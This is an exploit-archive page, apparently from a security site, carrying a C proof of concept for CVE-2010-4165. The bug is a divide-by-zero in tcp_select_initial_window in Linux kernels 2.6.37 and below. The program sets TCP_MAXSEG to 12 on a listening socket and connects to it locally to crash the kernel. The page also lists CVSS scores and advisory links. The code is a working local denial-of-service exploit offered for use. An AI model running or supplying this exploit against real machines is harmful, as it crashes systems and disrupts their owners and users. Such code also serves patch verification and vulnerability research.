Linux Kernel <= 2.6.37 Local Kernel Denial of Service

2011.03.02
Credit: prdelka
Risk: Low
Local: Yes
Remote: No
CWE: CWE-189


CVSS Base Score: 4.9/10
Impact Subscore: 6.9/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

/* Linux Kernel <= 2.6.37 local kernel DoS (CVE-2010-4165) * ======================================================= * A divide by 0 error occurs in tcp_select_initial_window * when processing user supplied TCP_MAXSEG facilitating a * local denial-of-service condition (kernel oops!) in all * Linux Kernel 2.6.x branch (2.6.37 & below). This issue * can be triggered easily with a call to setsockopt() on * a listening network socket and then establishing a TCP * connection to the awaiting socket. * * -- prdelka * */ #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netinet/tcp.h> int main() { int optval, optlen, ret, sd, sd2, pid; char *host = "localhost"; struct sockaddr_in locAddr; struct sockaddr_in servAddr; struct sockaddr_in dstAddr; printf("[ Linux Kernel tcp_select_initial_window divide by 0 DoS\n"); sd = socket(AF_INET, SOCK_STREAM, 0); memset(&servAddr,0,sizeof(servAddr)); memset(&dstAddr,0,sizeof(dstAddr)); servAddr.sin_family = AF_INET; servAddr.sin_port = htons(60000); servAddr.sin_addr.s_addr = INADDR_ANY; dstAddr.sin_family = AF_INET; inet_aton("127.0.0.1", &dstAddr.sin_addr); dstAddr.sin_port = htons(60000); if((bind(sd,(struct sockaddr *)&servAddr,sizeof(struct sockaddr))) == -1){ printf("[ Cannot bind listener service\n"); exit(-1); } listen(sd,4); optval = 12; ret = setsockopt(sd, IPPROTO_TCP, TCP_MAXSEG, &optval, sizeof(optval)); if(ret==0) { printf("[ System is not patched against CVE-2010-4165\n[ Goodnight, sweet prince.\n"); int sin_size = sizeof(struct sockaddr_in); switch(pid = fork()) { case 0: sd = accept(sd,(struct sockaddr *)&locAddr,&sin_size); sleep(3); default: sd2 = socket(AF_INET, SOCK_STREAM, 0); connect(sd2, (struct sockaddr *)&dstAddr, sizeof(dstAddr)); sleep(3); } } printf("[ System is patched, no dreams for this prince\n"); return 0; }

References:

http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=7a1abd08d52fdeddb3e9a5a33f2f15cc6a5674d2
https://bugzilla.redhat.com/show_bug.cgi?id=652508
http://www.vupen.com/english/advisories/2011/0298
http://www.vupen.com/english/advisories/2011/0124
http://www.vupen.com/english/advisories/2011/0012
http://www.spinics.net/lists/netdev/msg146495.html2000
http://www.spinics.net/lists/netdev/msg146405.html
http://www.securityfocus.com/bid/44830
http://www.osvdb.org/69241
http://www.openwall.com/lists/oss-security/2010/11/12/4
http://www.openwall.com/lists/oss-security/2010/11/12/1
http://www.mandriva.com/security/advisories?name=MDVSA-2011:029
http://www.kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.37-rc2
http://secunia.com/advisories/42932
http://secunia.com/advisories/42801
http://secunia.com/advisories/42778
http://lists.opensuse.org/opensuse-security-announce/2011-02/msg00000.html
http://lists.opensuse.org/opensuse-security-announce/2011-01/msg00004.html
http://lists.opensuse.org/opensuse-security-announce/2011-01/msg00001.html
http://lists.opensuse.org/opensuse-security-announce/2011-01/msg00000.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top